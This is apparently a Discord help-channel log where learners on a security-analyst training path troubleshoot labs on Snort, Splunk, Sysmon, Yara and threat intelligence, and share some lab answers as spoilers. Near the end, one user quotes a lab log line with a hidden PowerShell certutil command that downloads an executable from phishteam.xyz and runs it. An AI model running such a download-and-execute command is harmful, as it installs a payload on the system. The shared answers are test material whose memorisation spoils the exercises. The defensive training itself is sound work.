I'm wondering .. is this path gets u to really understand real-time procedures and scenarios .
Like how to handle events and responsed .
In other words is the completion of this path + comptia pentest+ cert + ccna + 2 years experience as a network technician enough to get me my first job in the field???

bold wind
#

that’s circumstantial

#

but more knowledge would surely help

floral zodiac
quiet veldt
hazy kettleBOT
#

Gave +1 Rep to @floral zodiac (current: #1436 - 2)

floral zodiac
quiet veldt
#

I doing the network miner and the VM is super slow

floral zodiac
quiet veldt
floral zodiac
#

Interesting

#

You using the attack box?

quiet veldt
floral zodiac
#

If you haven’t already, try changing your region in the access section of the site. No clue if that works but maybe? Seemed to help me a while ago as I’m not having as many slow sessions as I used to, at least that’s what it feels like

quiet veldt
#

ok, i'll try that mate thanks for that.

floral zodiac
#

No prob my dude

ripe anvil
plush crypt
primal igloo
primal igloo
plush crypt
hazy kettleBOT
#

Gave +1 Rep to @primal igloo (current: #1 - 2558)

plush crypt
primal igloo
#

Just hit cancel

plush crypt
#

In "Cyber threat intelligence" Scenario 1, after I input the file sha256 the report didn't show any Detection Alias that starts with an H'

tight tendon
floral zodiac
#

Go to the top of the website toolbar and click the Access selection. You can change your server there

#

Ps I have no clue if this actually helps anything. Could be total placebo 🫠

tight tendon
hazy kettleBOT
#

Gave +1 Rep to @floral zodiac (current: #882 - 4)

floral zodiac
plain scaffold
#

Question: Mimikatz, a Know attack tool, was detected running on the IT Manager's computer what is the mission of the tool?

primal igloo
plain scaffold
primal igloo
#

😄

floral otter
mortal scaffold
#

boogeyman1
any hint here ?

#

used tshark to retrieve the ex-filtrated file which starts with 27f***** and converted most of the ascii strings into text but i can't locate the credit card number is there a shorter way ?
Update: i think the last question is a bit advanced.

mortal scaffold
#

@open quest

nocturne cave
#

I’m in the e Sysmon room on task 4 third question. I have identified the event and have tried to put in the UTC time as requested but it marked as incorrect, I checked writeups and videos and everyone is getting the same answer?

nocturne cave
#

yes one second i got disconnected

#

should i send as a spoiler?

#

||2021–01–06 01:35:50.464||

#

im not sure what just happened maybe there was a punctuation mark i didnt see or something i just resubmitted the answer and it worked

#

thanks for responding mach

mortal scaffold
novel ginkgo
#

For those working in this field what other labs for try hack me will you recommend me to complete as I just completed splunk any other's interesting labs?

floral zodiac
#

IDS/IPS modules, EDS there’s so much you can do in the SOC learning paths.

novel ginkgo
nocturne cave
#

Would anyone be able to answer a question for me about the itsyBitsy room? I found the answer to the second question concerning the suspicious IP but I was wondering what exactly makes it suspicious? Is it that its ||User_agent is an admin account||?

#

added spoiler to avoid the clue if anyone doesnt want it

floral zodiac
plush crypt
#

Hello there, can someone explain how to use snort to analyse a packet: Must I use the conf file every time I use snort i.e /etc/snort/snort.conf? When I run snort e.g "sudo snort -de" and I run the traffic script it doesn't change anything on the snort prompt ( The instruction stated it should show in Verbose mode after running traffic script) what could I have been doing wrong

spring walrus
#

Hello who's at the retracted room right now?

#

I can't seem to find the answer for task 2 q3 the time in details of the file is wrong

primal igloo
nocturne cave
spring walrus
#

Oh thanks

nocturne cave
spring walrus
#

I've finished my 2hrs without advancing I'll just sleep through it now hoping to get answer tomorrow I'm very sleepy that I can't focus 😆

nocturne cave
#

I feel that I got really frustrated with that room hope you get it tomorrow!

nocturne cave
#

is anyone else having trouble with the splunk basics room? When I try to search for the IP 107.14.182.38 to find the username in the question I get 0 results? I watched a youtube writeup and followed it exactly but he is getting results?

#

the last IP of the same task is also not appearing?

scenic heron
plush crypt
hazy kettleBOT
#

Gave +1 Rep to @scenic heron (current: #1449 - 2)

plush crypt
#

Hello there, In Snort Task-8, how are we suppose to get a pcap ?

scenic heron
plush crypt
scenic heron
#

Are you running snort from within the task 8 directory?

#

Either run the shell from within the directory or cd to it

plush crypt
#

🥸 wow, I didn't realise that. Thank you for your time 🙂

scenic heron
#

no worries

autumn garden
#

One thing I've learned is no matter how experienced you are, it pays to study for your interview. So when you start interviewing make sure you do some interview prep. Youtube has tons of videos on soc analyst interview questions

floral zodiac
hazy kettleBOT
#

Gave +1 Rep to @autumn garden (current: #2182 - 1)

old plaza
#

In the TEMPEST room there is a tool on the attached VM called SysmonView. The room says it is one of Eric Zimmerman's EZ Tools but it isn't. I've searched everywhere for a place to download that tool with no luck.
Does anyone have an idea as to where I can download or obtain a copy of that tool?

primal igloo
primal igloo
primal igloo
old plaza
# primal igloo Are you in the split screen or the attackbox?

Hi Scrubz,
Thank you for your answers.
I don't have any problem using it in the VM. I want to download and use it on personal computer so I can practice different scenarios.
I also have clicked the link for EZ tools but SysmonView is not listed on his github page with the rest of the EZ tools.
Like I said I want to find it to use in my personal computer.
Do you or anyone else know where I can find it?

torpid acorn
old plaza
hazy kettleBOT
#

Gave +1 Rep to @torpid acorn (current: #1458 - 2)

warm abyss
#

For Threat Inteligence Tools Task 7, is it possible that the detection aliases for the hash have changed? I've googled and found the answer, but it just isn't included in the Talos list anymore.

primal igloo
timid vale
#

For windows forensics 1, why is the last known good configuration control001 when in the text it says this?
|| In most cases, ControlSet001 will point to the Control Set that the machine booted with, and ControlSet002 will be the last known good configuration. Their locations will be:

SYSTEM\ControlSet001

SYSTEM\ControlSet002 ||

primal helm
#

Hello everyone, there seems to be a bug in the “Benign” room question #9 (The suspicious file downloaded from the C2 server contained malicious content with the pattern THM{..........}; what is that pattern?). I tried using the flag located at https://controlc.com/e4d11035 but it’s not working.

nocturne cave
proper meteor
hazy kettleBOT
#

Gave +1 Rep to @timid vale (current: #2204 - 1)

timid vale
#

No problem. Do I get a cookie? A 1 month voucher maybe? 😉

proper meteor
#

I think the text to the question could be clarified or maybe changed. The SYSTEM\Select\LastKnownGood REG_DWORD contains the value to what currentcontrolset was the last known good. (maybe that is currentcontrolset001, maybe currentcontrolset002). In the body of Task 6 it talks about LastKnownGood and it has as screenshot showing LastKnownGood as 0x1 so the question/answer is correct as per this screenshot. The text mentioning ControlSet002 would could do with an clarification or rewording. Maybe even a better question could be around what registry would you look for to identify what CurrentControSet holds the lastknowngood.

static wagon
#

Hey all, I am having an issue in a VM within the Snort challenge - Basics. As soon as I create a log through the snort command line (sudo snort -c local.rules -l . -r [pcap file]) the log appears for a second and then disappears.
Such thing never happened before in any of the previous excercise.
Can anybody help me?

I spawned the machine few times and now it works!

nocturne cave
#

Hi team, I just wanted to report some ambiguity with questions or confirm if maybe I'm missing something, going through the MITRE room as a refresher and getting the below questions. Specifically, the questions in ATT&CK Framework citing "this technique" is vague (Q's 2 and 3) and doesn't highlight what technique needs to be ID'ed. Am I missing something here or is this insufficiently worded?

#

(I would show a screenshot but I have limited privileges, assuming due to being new.)

#

Never mind, overlooked the content wording toward the bottom of the task, Answer the questions below didn't reference it, that's on me for not reading close enough

#

Q5 of that task may need an update as there are four groups now

#

Q10 also incorrect, techniques have increased to 16

young wren
#

Hi. In the T&VM Mitre room, this question "What groups have used spear-phishing in their campaigns? " might need to be validated. I think the answer should be Axiom,Hikit not Axiom,GoldSouthfield.

dapper flame
young wren
hazy kettleBOT
#

Gave +1 Rep to @dapper flame (current: #2212 - 1)

warped wind
#

Hmm

floral zodiac
dapper flame
fading spruce
#

Hey guys,
I'm working on
SOC Level 1: Network Security and Traffic Analysis - Snort Challenge - The Basics, and I’ve hit a bit of a roadblock with some questions. I’ve managed to get the correct outputs, but they aren’t being accepted as correct answers. Here’s what I need help with:

  1. Destination address of packet 63
My answer: 145.254.160.237
  2. ACK number of packet 64
My answer: 0x38AFFFF3
  3. SEQ number of packet 62
My answer: 0x38AFFFF3


    I’ve checked the log files as per the hints, but I’m still having trouble. Any guidance on what I might be missing or doing wrong would be greatly appreciated!
    Thanks in advance for your help!
jade shore
#

hi , i have a problem with phising prevention room , when i submit the answer which is "<domain> service ready" dose not working, please help me to solve the problem i still just have this question and than finsh the whole room on soc1

fading spruce
jade shore
#

i think the problem not from us the problem with tryhackme

wraith raven
#

Make sure you capitalize the S in service

#

Ah i see you got an answer

jade shore
#

i found the solution from someone on the discord the problem was to remove just <> and it will be the answer like this. domain service ready

wraith raven
#

My answer was <domain> Service ready

jade shore
#

If you try it with another account it won't work

jade shore
#

now , how can i download the certificate, it just appear without the download button

final stream
tepid hill
serene field
#

Hey team, I'm working through the Snort Challenge - The Basics and I could use some help. I can't get the correct answer/number of packets for question 1 in the "Writing IDS Rules (HTTP)" section. I keep getting 328 and my rule to detect "all TCP port 80 traffic" goes as follows: 1. alert tcp any 80 <> any any (msg:"TCP Port 80 Src Traffic"; sid:100001; rev:1;) 2. alert tcp any any <> any 80 (msg:"TCP Port 80 Des Traffic"; sid:100002; rev:2;)

fading spruce
hazy kettleBOT
#

Gave +1 Rep to @final stream (current: #2220 - 1)

plush crypt
#

Hello there, I am trying to use Wazuh server but it kept showing "The connection has timed out" I waited more than 5 minutes before accessing the link

arctic plover
#

Hi guys,
I'm currently stuck on the Yara room, task 9 (Creating Yara rules with yarGen), with the question "Copy the Yara rule you created into the Loki signature directory"
The question doesn't ask for an answer but I just don't understand what they asked me to do, my common sense that's broken here, so am I supposed to move the file "file2.yar" to the same directory as the file "loki.py" or am I supposed to run a command to copy the content of "file2.yar" inside the file "loki.py" ?

dapper flame
arctic plover
hazy kettleBOT
#

Gave +1 Rep to @dapper flame (current: #1116 - 3)

arctic plover
#

Okay nevermind, my brain started to work again, I didn't get that the "Loki signature directory" from the question is in reality a directory called "signature-base" and I needed to move the "file2.yar" rule to the sub folder called "yara"

arctic plover
#

Hey there, I don't know if it's a bug or not :
I'm in the OpenCTI room on the task 6 for the question "How many malware relations are linked to this Attack Technique?" and so I'm looking in the 'Related Entities' category (in the Knowledge tab) to see how many there are but it's empty (image 1) and when I look in the Overview category (still in the Knowledge tab), I can see 3 malwares (image 2) related but the answer expect 3 characters so I'm a bit confuse. I also check in the Malware category and indeed there is 3 malwares related (image 3) but I still don't find an answer
If someone could lend me an hint I would be grateful

EDIT : I got the answer, there is 2 technique with the same name, I was looking at the wrong one

old plaza
#

Hi all.
I have a question about the "Retracted" room in the SOC level 1 path.
A file named antivirus.exe is present at C:\Users\Sophie\download\antivirus.exe
That file had to be created at some time. Why is there no sysmon event 11 that contains the words download\antivirus?
If you check the properties of the antivirus file it shows to have been created on ‎Monday, ‎January ‎8, ‎2024, ‏‎2:14:27 PM
The attached pic shows a process creation at 2:15 as the first time "download\antivirus" is found. How can a file be created without there being a event 11?

vague cypress
#

I cant seem to connect to the opencti dashboard on the opencti room? I gave it 10+ min on attackbox but still refusing connection

primal igloo
#

Nmap it.

vague cypress
#

Got it now, took almost 20 min to start up though

primal igloo
#

Yeah, that service possibly takes the longest.

languid sedge
#
└─# nslookup tryhackme.com 10.200.26.101
;; communications error to 10.200.26.101#53: timed out
;; communications error to 10.200.26.101#53: timed out
;; communications error to 10.200.26.101#53: timed out
;; no servers could be reached

``` why is it not working?
primal igloo
languid sedge
kind violet
#

Is sysomon kinda like a local siem?

#

Where you can set up rules and alerts, unlike event viewer or process viewer?

fresh flower
#

i'm on the threat intelligence tools room task 7, I generated the hash and fed it into the talos and while it does show me several aliases none of them start with H

warped wind
#

hm

floral otter
#

Only thing I can think of is integrating sysmon with a SIEM so you can do both and have less noise in your SIEM

#

Also sysmon logs process creation which is very helpful too

proper delta
#

6

hearty isle
#

Hello, is there a problem on VM MISP_2023_v4 ? I just have Gateway time-out

hearty isle
#

Problem solved: the link don't replace the ip 🙂

slate field
#

I thought the learning path are free but I have not been able to subscribe

wraith apex
#

Hey THM community, I'm struggling with the room "Creating Yara rules with yarGen'. Please DM me if you could help :)))

swift rain
pure hill
pure hill
#

oh there finally it loaded 20min it is 😆

vague cypress
#

Yeah it takes a long while

slate field
#

Please do anyone have books on incident response or SOC

nimble oasis
slate field
#

@nimble oasis thank you

hazy kettleBOT
#

Gave +1 Rep to @nimble oasis (current: #3 - 1924)

proper coral
#

Hey all, just completed the Retracted Room in the SOC 1 learning path, I was wondering if anyone knows why a malicious actor would gain a change of heart and decrypt all the encrypted files/donate a large sum of bitcoin after the fact. There must be more to this that I'm missing, no?

visual salmon
#

Hello.
I've got a question but I'm not sure if this is the right chat. If not, I'll delete it, I'm doing the SOC path but every time I use the attack box, it takes an extremely long time to load, write, and open tools. It’s taking me twice as long to complete tasks because of the lag. Is this normal? I've been using THM for almost a year now, but this is the first time I notice everything gets so slow

primal igloo
proper coral
hazy kettleBOT
#

Gave +1 Rep to @primal igloo (current: #1 - 2884)

deep trout
#

Can someone recommend a place to enhance Wireshark skills learned from the SOC L1 path? I gave www[.]malware-traffic-analysis[.]net a try, the exercises that exist on the site but even then, I only found like 1/10 of the information, the rest was incorrect, I know that Wireshark or analyst skills in general are crucial for the role and I wish to improve them, if anyone knows a way to do that or in general to recommend something, please let me know!

floral otter
deep trout
deep trout
floral otter
#

Thing is, it’s kinda hard to find other resources that explain everything because once you get the basics Wireshark commands, you have to use your investigative skills to find the stuff you’re looking for

keen saddle
#

Having trouble getting past SOC Level 1 -> Cyber Defence Framework-> MITRE-> Task 8, last question

keen saddle
#

@blissful loom or Other staff ^

deep trout
# keen saddle Having trouble getting past SOC Level 1 -> Cyber Defence Framework-> MITRE-> Tas...

Hey there, it seems like the MITRE framework has been updated, making the answer no longer valid.

The original answer is ||Azure AD, Google Workspace, IaaS, Office 365, SaaS|| which can be found under Valid Accounts: Cloud Accounts by referring to question #2 as mentioned in the task.

Using a wayback machine, you can see the valid answer here - https://web.archive.org/web/20240613094045/https://attack.mitre.org/techniques/T1078/004/

Hope that helps out, meanwhile I'll report the issue to the admins 🙂

keen saddle
hazy kettleBOT
#

Gave +1 Rep to @deep trout (current: #377 - 14)

deep trout
fringe glacier
#

Hey there, currently doing the Secret Recipe room (Windows registry) and was working on the question
What is the Last DHCP IP assigned to this host?
based on the last Last Write Timestamp of one of the subkeys being 2022-10-12 8:53:05 PM UTC, I figured this subkey would contain the answer; however, the expected answer is actually from a different subkey which has the last write timestamp of 2021-03-17 2:58:47 PM UTC.

am I missing something or is the expected answer wrong?

keen saddle
#

The Summit room in SOC Level 1 -> Cyber Defence Framework->Summit. WHen launching the attack box the url given shows a bad gateway error?

jovial willow
#

Damn i finally completed the Zeek room with almost no help from the write ups !
I'm feeling the knowledge pouring into me bits by bits at last !

rain rapids
#

Hi, anyone got tips on how to gradually get better at solving the capstone challenges without relying on writeups somewhere down the line? I feel like the rooms themselves are manageable but its just that there are times where I get stuck, maybe just understanding the writeups is a good way to start and just repeating the room and writing every detail and thought I have would help? Just curious if anyone has some notes/pointers, cause I took a peek of soc level 2 and log analysis looks it would have been super helpful for the rooms in soc level 1 path, like soc-1 is really good at teaching basic fundamentals and how to use the tools, especially with the provided commands, but it doesn't really teach you how to think for yourself i feel like or maybe i'm doing something wrong :I

steel igloo
rain rapids
#

Yeah.. I mean I play CTFs and didn't understand anything first few months, after reading most writeups per ctf i started getting enough knowledge to understand and start placing at least not at the very bottom of the CTFs lol, but i don't know if thats a good way to learn actual cybersecurity hahaha maybe someone got a really goated method, i start talking to myself to try and break down a problem but it gets looped back to the problem of me not understand enough of the basics or the actual thought process of where to look for the specific IoCs and etc, using tools is fairly okay, knowing where to look at and interpreting data is difficult, to say the least

undone wedge
deep trout
#

out of all the SOC stuff I've learned so far which is around 60% of it, Splunk is probably one of the coolest thing I've stumbled upon, it's creators deserve to be praised by security analysts

keen saddle
#

Im having issues completing Task 7 and 8 of
SOC Level 1 -> Cyber Threat Intelligence ->Threat Intelligence Tools
The second question on T7 and the second question of T8.

#

In not sure about T7, but I know T8 is ||Trojan||

vagrant charm
vagrant charm
plush junco
vagrant charm
#

You also check in virustotal HackingMagic

plush junco
hazy kettleBOT
#

Gave +1 Rep to @vagrant charm (current: #245 - 25)

keen saddle
hazy kettleBOT
#

Gave +1 Rep to @plush junco (current: #1181 - 3)

timid vale
#

Hi, I managed to clear the capstone challenges for SOC 1, but somewhere down the line I had to use writeups, most of the email/basic splunk stuff was easy, but searching for specific answers just wasn't up to my knowledge, anyone know where I can read up on how to get the proper mindset to do hive forensics and etc?

deep trout
timid vale
#

Thanks, I'm still stuck on understanding which hives to look at for specific data, I'll just be relying on cheat sheets for now

granite hornet
hazy kettleBOT
#

Gave +1 Rep to @vagrant charm (current: #179 - 40)

vagrant charm
fossil tundra
#

Hey, how much time does it typically take to complete the SOC Level 1 path? I’m preparing for a SOC role and plan to learn from the SOC Level 1 path and complete it within this month. After that, I plan to start applying for SOC jobs next month. What do you think of my plan? Is it possible to finish it within this month if I start today?

silver sage
#

What does soc mean
Where we use it

fossil tundra
#

The hyperlink for the Fireye apt group is not available and it redirects to the google cloud website Mandiant page.

#

In Pyramid of Pain room

mortal magnet
#

phew, this one was slow-going for a bit, definitely not the most intuitive tool out there to get up and running with, but once I figured it out it was actually pretty cool and the practical portions of the room were very straightforward. definitely set aside a block of time for yourself when you do this one; besides the time it takes to figure out how to use it, just loading a project into the thing takes like 10-20 minutes.

vocal hound
errant hatch
#

"System Information was not configured to be collected. Click here to review which audits where configured" and u click and it literally has all categories from Sys Information lmao

mossy venture
#

Hi

fiery marsh
#

i have a problem with snort challenge - the basics, Task 2: all the questions i get are same as in writeups i found but when i type it in as answer it isnt good, so am i missing something or the code im running isnt good?

#

i just wanna know how did u guys do task 2, 2nd question and ill figure it out alone but for some reason it aint working

sour yacht
#

For task 2 question 2:
Check if you have sudo permissions to view any files snort produces - use command sudo chown +R ubuntu /home/ubuntu/Desktop/Exercise-Files/
Make sure the rules in local.rules are:
alert tcp any 80 <> any any (msg:"TCP port 80 inbound traffic detected";sid:1000000000001; rev :1) and
alert tcp any any <> any 80 (msg:"TCP port 80 outbound traffic detected";sid:1000000000002; rev :1) (place each rule on an individual line)
--EDIT--
Remove the previous alert file and snort log: sudo rm [PREVIOUS SNORT LOG] ; sudo rm alert
Run snort again with: sudo snort -A full -r ftp-png-gif.pcap -c local.rules -l .
--EDIT ENDS--
Search for the 63rd packet by using snort -r [SNORT LOG HERE] -n 63, then just look at the terminal to find the destination ip
hope this helps you out @fiery marsh

gaunt helm
#

Hey community! I am facing an issue with room "Snort Challenge - The Basics". I completed all tasks but for three questions of Task 2 my answers are not accepted. Despite of that I think that my answer is correct the format is not matching the answer format and so it is not accepted. Here we go: Question 2 "What is the destination address of packet 63?" if I look into packet 63 I see as destination IP "145.254.160.237" but the wanted answer format is "...". The same for question 3 "hat is the ACK number of packet 64?" and 4 "What is the SEQ number of packet 62?" where my answers are not accepted. Could someone please en-light me? Thanks in advance....

oblique briar
#

help please

tepid hill
restive gull
#

I’m currently working on wireshark traffic analysis and have a question about the dns pcap question what is abnormal dns traffic?

quasi bough
fallow barn
#

Has anyone else experienced problems with connecting to the MISP room?

quasi bough
dim plaza
pseudo oxide
#

You get certificate if you complete SOC level 1? I just started, seems long too. Can I put it on my resume or should I just say I have experience in an SOC environment?

quasi bough
pseudo oxide
#

do i have to use my own email to use the phishtool?

iron stream
#

Nvm to this, I am super slow

pseudo oxide
#

Hey, What room has the link to cyber chef?

quasi bough
pseudo oxide
#

I’m stuck on task 5. How and what am I supposed to defang?

quasi bough
pseudo oxide
#

I tried everything. What up address am I supposed to defang?

quasi bough
pseudo oxide
#

Task 5

#

What’s originating up address? Defang the up address

quasi bough
vivid talon
#

I'm in yara trying to start VM, its just black screen, what am I doing wrong? am I dumb?NotLikeThis

quasi bough
vivid talon
#

many times, I also tried other browsers, disable adblocker, another computer with another wifi still no use

quasi bough
vivid talon
#

it won't let me, I press on view in full screen and nothing happens?

#

do I need to press start attackbox too? in addistion to start VM?

quasi bough
vivid talon
#

thanks!!

restive gull
#

I'm almost completed the soc level 1 path(90%) done. Now i noticed the soc simulator anyone tried it yet? i'm curious about it and took a peak at it, but never wrote a report so is there someone who can help me with it?

quasi bough
pseudo oxide
#

How am I supposed to use virus total to scan a file if I can’t connect to the internet?

pseudo oxide
#

I need the file

quasi bough
pseudo oxide
#

Yall expect me to download a file off a VM to my computer?

#

That’s what I was thinking

#

I knew that

quasi bough
pseudo oxide
#

lol

restive gull
quasi bough
restive gull
quasi bough
restive gull
sick narwhal
#

FYI: The Brim reference a tool which was reneamed Zui in 2021 and is concidered Legacy tool by the devs.

quasi bough
hazy kettleBOT
#

Gave +1 Rep to @restive gull (current: #2586 - 1)

runic coral
#

Has anyone else ran into difficulties with the NetworkMiner lab? Everytime I open the mx-7 pcap and apply filtering the app crashes then the VM either crashes or shuts down…

runic coral
#

Also on a side note in the same room, the question asking for which email sent the password reset. It’s not actually a password reset email.

deep trout
#

I somewhat remember I had to analyze multiple PCAP files and some were working, others not really (slow load times / crashing)

sour cedar
#

And I am done, keep grinding at it! I got stuck a couple times, you will have it beat before you know it.

pseudo oxide
#

Hey, how come I can’t get Loki to run on the VM I tried everything. I’m stuck on this task

sour cedar
quasi bough
quasi bough
pseudo oxide
quasi bough
pseudo oxide
quasi bough
pseudo oxide
quasi bough
pseudo oxide
#

👍

pseudo oxide
#

It’s still not working

#

Why can’t I run Loki?

quasi bough
pseudo oxide
quasi bough
#

cd - change directory

pseudo oxide
#

I know

quasi bough
pseudo oxide
#

Cause I’m getting desperate

quasi bough
pseudo oxide
#

I’m a little rusty that’s all

quasi bough
pseudo oxide
quasi bough
pseudo oxide
#

That work

#

I did that command before

quasi bough
pseudo oxide
#

I’m not getting of the answers to the questions

#

Why is this not working

#

👋

wheat crane
#

The directions say to call Loki.py from within the directory with the suspicious files

#

note that I am calling Loki from the file 1 directory you called Loki from within the Loki directory

pseudo oxide
#

Where is the file name and version of the web shell?

pseudo oxide
#

Hey

#

How do you copy paste the hash so I can complete this task ?

pseudo oxide
#

I’m using my own machine.

#

I’m connected using OpenVPN

nimble oasis
quasi bough
pseudo oxide
pseudo oxide
nimble oasis
#

windows or linux???
vm or not???

pseudo oxide
#

I got it to work. Took a while to figure it out.

#

I’m just a little rusty plus I’m at my other job so my time is limited.

wheat crane
quasi bough
hazy kettleBOT
#

Gave +1 Rep to @wheat crane (current: #255 - 26)

arctic plover
#

Hi there, how are you guys doing ?
I'm currently working on the snort challenge - The Basic room and I'm stuck on Task 4, the first question : "Investigate the logs and identify the software name embedded in the packet."

I'm trying to run the following command : sudo grep -a -i "software" snort.log.1737399919
but all I get is a bunch of unreadable characters, can you give me an hint to put me on the right path please ?
I tried to run the command with an others strings but nothing so far

quasi bough
weary dew
#

Hello everyone. I have a bit of hiccup in Windows event logs task 5.1 and task 5.2.

Can anyone help me?

weary dew
weary dew
#

My answers seems to be wrong. Don't know why.

quasi bough
weary dew
# quasi bough What are your answers ?

Get-WinEvent -LogName Application -FilterXPath ‘*/System/Provider[@Name=”WLMS”] and */System/TimeCreated[@SystemTime=”2020–12–15T01:09:08.940277500Z”]’

question task 5.1

#

Get-WinEvent -LogName Security -FilterXPath ‘*/EventData/Data[@Name=”TargetUserName”]=”Sam” and */System/EventID=”4720"’

question task 5.2

weary dew
weary dew
quasi bough
# weary dew https://tryhackme.com/r/room/windowseventlogs

You answers seems correct but your formatting may be bad , try to refresh the page and copy this 🙂
Get-WinEvent -LogName Application -FilterXPath '*/System/Provider[@Name="WLMS"] and */System/TimeCreated[@SystemTime="2020-12-15T01:09:08.940277500Z"]'

#

Get-WinEvent -LogName Security -FilterXPath '*/EventData/Data[@Name="TargetUserName"]="Sam" and */System/EventID=4720'

weary dew
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #2 - 2308)

weary dew
quasi bough
#

That was the problem 🙂

weary dew
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #2 - 2310)

violet void
#

Not an important question, but I just saw the SOC Simulator email - the SOC sim has been up for a while now right? Or am I gaslighting myself lol

wheat crane
quasi bough
arctic plover
#

Hi there,
I got a question regarding the Networkminer room, on task 7, Is it me or the given frame number doesn't exist ?

#

And yes I opened mx-7.pcap

#

The only question I found so far is the source address of the image "ads.bmp.2E5F0FD9.bmp", otherwise, for all the question related to frame number, I don't manage to find them, each time there are not in the Files list

quasi bough
arctic plover
#

I managed to find the answer by other mean but it was the same question as shown in the screenshot above

swift bay
#

Hmmm... All but the last 2 rooms of the module in one weekend. To keep going or to rest my eyeballs, that is the question... 😅

quasi bough
swift bay
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #2 - 2544)

swift bay
#

Yup, did one more, now my eyes are bleeding 😭
I'm calling it right there

quasi bough
graceful anvil
#

^ xD

merry pelican
#

Shouldn't it be "greater than 1,000,000"?

pseudo oxide
#

where do i find the answer to the puppyRAT question

#

im in MISP task5

quasi bough
pseudo oxide
#

i cant find it

#

search didnt work

pseudo oxide
#

im stuck

#

i need to know exactly where to find the information

rocky sparrow
#

i need help with cyber kill chain task 9

wheat crane
quasi bough
rocky sparrow
#

yes found the answer

#

thank you

unreal quarry
#

Hello, am working on SOC simulation lab - Phishing Unfolding and when i try to access to the analyst VM they asked me to type a username and password, did any one know the creds?

unreal quarry
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #2 - 2766)

novel ginkgo
#

Hi I would like to ask about the soc simulator understand that it operates similarly to the their competitor from letsdefend unfortunately I dont get my gradings am I doing anything wrong after closing the report as True positive and there are no attachments for me to investigate from the email as well ?

quasi bough
keen briar
#

I am stuck in the Yara room with the question: What JavaScript library is used by file 2? The hint says Go to the Github page and search inside the index.php file. Please help

keen briar
quasi bough
#

First line are PHP req.

#

Line below states which js library is beign used 🙂

keen briar
keen briar
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #2 - 2894)

quasi bough
weary dew
#

@quasi bough what's up man?

quasi bough
weary dew
#

I am stuck in TheHive project room

#

I type in the answer, but it says 'wrong answer' in task 5.3 of the room.

quasi bough
weary dew
quasi bough
weary dew
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #2 - 2937)

weary dew
#

@quasi bough hello. Are you available?

quasi bough
weary dew
quasi bough
weary dew
#

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w hidden -noni certutil -urlcache -split -f ‘http://phishteam.xyz/02dcf07/first.exe' C:\Users\Public\Downloads\first.exe; C:\Users\Public\Downloads\first.exe

quasi bough
weary dew
quasi bough
weary dew
#

The answer format says Remove the double quotes from the log

quasi bough
weary dew
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #2 - 3088)

nocturne flax
#

hi all, I have a question about Zeek. not directly related with soc level 1.

I was trying to figure out how the conn.log file works because I've noticed on some occasions that it seems like certain traffic isn't being logged in conn.log. I tried running some tests, and one of them was performing a ping on my network. Although I see some ICMP entries in conn.log, I don't see any ICMP records from the pings I'm sending. Do you have any idea why this might be happening?

clear flax
ionic hedge
# nocturne flax hi all, I have a question about Zeek. not directly related with soc level 1. I ...

In Zeek, the conn.log file is designed to log connection-level details like IPs, ports, protocols, start and end times, and the state of the connection. But ICMP can be a bit tricky. Why the ping might not be showing up could be because of no connection for ping: in zeeks eye's isnt a connection because it doesnt establish a session like TCP or UDP. Its just a a request and a reply so it might not always log it in conn.log;

#

Run this cmd to see if your pings show up there: cat /path/to/zeek/logs/current/icmp.log

nocturne flax
hazy kettleBOT
#

Gave +1 Rep to @ionic hedge (current: #1319 - 3)

cobalt eagle
#

Hello

#

Any one knows pyramid of pain exercise

#

I need help thanks

quasi bough
cobalt eagle
#

I will let you know thanks

nocturne prism
#

stuck here with the room phishing analysis phishing case 1, what is the From email address?

#

smth is wrong w this room, my answer should be right, the new format sucks

#

pls help

quasi bough
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #2 - 3353)

kindred saffron
#

Hiii guys

#

I just completed the SOC Level 1, how long does it take before I'll see my certificate please?

quasi bough
kindred saffron
#

Thanks KGB, I just completed the SOC LEVEL 1, but I haven't been certified

#

Also @quasi bough How'd you link your discord with your thm account so I can get my wizard role

quasi bough
kindred saffron
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #2 - 3366)

quasi bough
kindred saffron
#

Okay

coarse sparrow
#

Anyone did the Redline room?

The VM is so slow, i can't get the audit script to finish. Already tried multiple times but it's stuck at 'Ensuring the proper working directory..."

I'm also getting instance terminations after the script is running quite some time.

I was fighting through the WindowsForensics1,2 and the Autopsy rooms lately and they also had this crappy performing VM attached. It was a nightmare.

#

Even the bloody file explorer takes minutes to load 😄 I'm not exaggerating.

red pine
restive viper
quasi bough
restive viper
# quasi bough What's the problem ?

I can't find an answer to the question in task 6 of intro to malware analysis room. Maybe I'm being dumb. But i cant find the two windows utilities that they are asking for

restive viper
# quasi bough What is the question 🙂 ?

In the process tree, there are two Windows utilities utilized by the malware to perform its activities. What are the names of the two utilities? (Format: utility1.exe and utility2.exe)

quasi bough
restive viper
#

I tried cmd.exe. but i couldn't find the second one

#

Plus i dont know if cmd.exe is correct. I have to get both of them to check.

quasi bough
hazy kettleBOT
#

Gave +1 Rep to @quasi bough (current: #1 - 3541)

restive viper
quasi bough
coarse sparrow
hazy kettleBOT
#

Gave +1 Rep to @coarse sparrow (current: #1770 - 2)

stiff hornet
#

I am doing the Snort room. It says that you have to run the generate-traffic script, but there seems to be already a lot of traffic on eth0. What I am doing wrong?

coarse sparrow
stiff hornet
#

Alright, thank you

quasi bough
stiff hornet
#

Ok, thanks

keen briar
#

Snort room > Task 8: After entering:
sudo snort -c /etc/snort/snort.conf -A full -l . -r mx-1.pcap

It shows: No such file or directory. Please help!

quasi bough
keen briar
#

I am not able to attach anything in this discord, is it just me?

primal igloo
fathom swanBOT
wanton vector
#

the csv file is not generating

#

what am i doing wrong

#

@primal igloo

#

can you help

strong lichen
worldly epoch
#

in yara room task 9, it asks if the .yar file you created works, but mine doesnt work so thats what i get and it does not allow me to continue with the task

west dew
#

What’s up y’all. What are y’alls thoughts on this room?

quasi bough
west dew
#

Still much to learn by the end?

#

Just wondering how far the path will take us.

quasi bough
west dew
#

Hmmm thanks

wary siren
#

Hi all,

I'm looking to refresh and skill up on some SOC Level 1 material. I'm considering purchasing the SAL1 exam, but I'm a bit confused by the description.

